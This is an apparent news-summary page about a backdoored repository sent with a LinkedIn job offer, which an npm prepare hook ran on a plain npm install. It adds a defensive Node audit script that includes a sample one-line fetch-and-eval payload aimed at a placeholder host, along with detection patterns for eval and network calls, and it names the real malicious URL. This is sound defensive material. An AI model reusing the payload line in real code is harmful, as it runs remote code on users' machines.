
A backdoor in a LinkedIn job offer

A developer, exercising 'extra paranoia' and using an AI agent, uncovered a supply-chain backdoor in a repository sent along with a LinkedIn job offer. The trap, disguised as a React/Node project, used an npm lifecycle script that runs during npm install to fetch and execute a remote payload. The story is a sharp reminder that even job opportunities can be vectors for well-crafted social engineering, and a prompt for vigilance among HN readers.

Score: 35 | Comments: 3 | Highest Rank: #1 | 22h on Front Page
First Seen: Jun 15, 8:00 PM | Last Seen: Jun 16, 5:00 PM
Rank Over Time (hourly): 311111122233222245582227

The Lowdown

A developer recounts a brush with a social engineering and supply chain attack that began with a LinkedIn job offer. What started as a standard recruitment message turned into a suspicious request to review a codebase, prompting the developer to treat it with extreme caution and to analyze it with an AI-powered tool rather than run it.

  • A recruiter from a crypto startup messaged the author on LinkedIn, eventually asking them to review a GitHub repository to address a "deprecated Node modules issue."
  • Sensing a red flag, the author chose a paranoid approach, cloning the repository onto a throwaway VPS and analyzing it with pi, an AI agent in read-only mode.
  • The AI agent immediately flagged app/test/index.js, revealing a hidden backdoor.
  • The backdoor assembled a URL (https://rest-icon-handler.store/icons/77) at runtime and packed its payload onto a single minified line that fetched and executed whatever that server returned.
  • Running the tests was not the trigger: the package.json prepare script, which npm runs automatically during a plain npm install, executes node app/index.js, which in turn does require('./test') and so loads the backdoor. Simply installing dependencies was enough to run it.
  • The GitHub commits were attributed to a real developer who was being impersonated and denied any involvement.
  • Similarly, the recruiter's LinkedIn profile belonged to an arts journalist, who, when pressed, suddenly displayed expert knowledge of npm and Node versions.
  • The author emphasizes that such sophisticated attacks can ensnare anyone, advocating for vigilance and good security hygiene, and highlighting the utility of AI agents for code review.
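
The check a practitioner would want before typing npm install in a repository like the one described above is a static pre-install audit: list the lifecycle scripts that fire on install, then scan the files they reach for the traits the post describes (a URL assembled at runtime, a very long minified line, fetched code passed to eval). The Node script below is an added example, not code from the original post or from the pi agent; the repository contents it scans are constructed for illustration, using a placeholder host (example.invalid) rather than the real payload, and the thresholds and regexes are heuristics chosen here, not anything the post specifies.

```javascript
// Added example (not from the original post): static audit of a cloned
// repository before running `npm install`. No network, no code execution.

// Lifecycle scripts npm runs during a plain local `npm install`
// (prepare runs on a bare install and when installing from git).
const INSTALL_LIFECYCLE = new Set([
  "preinstall", "install", "postinstall",
  "prepublish", "preprepare", "prepare", "postprepare",
]);

// Heuristic patterns (chosen for this example) for install-time payloads.
const SUSPICIOUS = [
  { id: "eval",         re: /\beval\s*\(|new\s+Function\s*\(/,                    why: "dynamic code execution" },
  { id: "network",      re: /\b(https?\.(get|request)|fetch|axios)\s*\(/,          why: "outbound request" },
  { id: "url-assembly", re: /["'`]https?:\/\/[^"'`]*["'`]\s*\+/,                   why: "URL built from fragments" },
  { id: "child-proc",   re: /child_process|\bexecSync\s*\(|\bspawn\s*\(/,          why: "spawns a process" },
];
const MAX_LINE = 500; // longer than this on one line: treat as minified payload

// Return every script in package.json that npm will run on install.
function findInstallHooks(pkgJson) {
  const scripts = pkgJson.scripts || {};
  return Object.keys(scripts)
    .filter((name) => INSTALL_LIFECYCLE.has(name))
    .map((name) => ({ hook: name, command: scripts[name] }));
}

// Scan one source file line by line and return findings.
function scanSource(path, source) {
  const findings = [];
  source.split("\n").forEach((line, i) => {
    if (line.length > MAX_LINE) {
      findings.push({ file: path, line: i + 1, id: "minified", why: `single line of ${line.length} chars` });
    }
    for (const s of SUSPICIOUS) {
      if (s.re.test(line)) findings.push({ file: path, line: i + 1, id: s.id, why: s.why });
    }
  });
  return findings;
}

// files: map of repo-relative path -> file contents (read from disk in real use).
function auditRepo(files) {
  const hooks = findInstallHooks(JSON.parse(files["package.json"]));
  const findings = [];
  for (const [path, src] of Object.entries(files)) {
    if (path.endsWith(".js")) findings.push(...scanSource(path, src));
  }
  let verdict;
  if (hooks.length && findings.length) verdict = "DO NOT npm install";
  else if (hooks.length) verdict = "review hooks before install";
  else if (findings.length) verdict = "review flagged files";
  else verdict = "no install-time hooks or obvious payload";
  return { hooks, findings, verdict };
}

// Constructed sample repository mimicking the layout the post describes:
// prepare -> app/index.js -> require('./test') -> one-line fetch-and-eval.
const SAMPLE_REPO = {
  "package.json": JSON.stringify({
    name: "react-dashboard-task",
    scripts: { start: "react-scripts start", test: "jest", prepare: "node app/index.js" },
  }),
  "app/index.js": "require('./test');\nmodule.exports = {};\n",
  "app/test/index.js": [
    "const https = require('https');",
    "const u = 'https://' + 'example' + '.invalid/icons/0';", // placeholder host, not the real one
    "https.get(u,r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))});" + "var _=0;".repeat(80),
  ].join("\n") + "\n",
};

console.log(JSON.stringify(auditRepo(SAMPLE_REPO), null, 2));
```

On the sample repository this reports the prepare hook and four findings in app/test/index.js (a URL built from fragments on line 2; a minified line that makes an outbound request and calls eval on line 3), and the verdict "DO NOT npm install". Two caveats: this is a heuristic and a determined author can obfuscate past all four patterns, which is why the post's approach of reading the code on a throwaway VPS is still the right first step; and if you must install anyway, npm install --ignore-scripts skips every lifecycle script (npm ci runs them too), at the cost of breaking packages that legitimately need a build step.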

Ultimately, this incident is a compact case study in how attackers pair convincing social engineering with install-time technical trickery to distribute malware. It underscores the need for skepticism and sound security practices whenever you are handed unfamiliar code or an unverified identity, and in particular for never running npm install on a stranger's repository before reading what its lifecycle scripts do.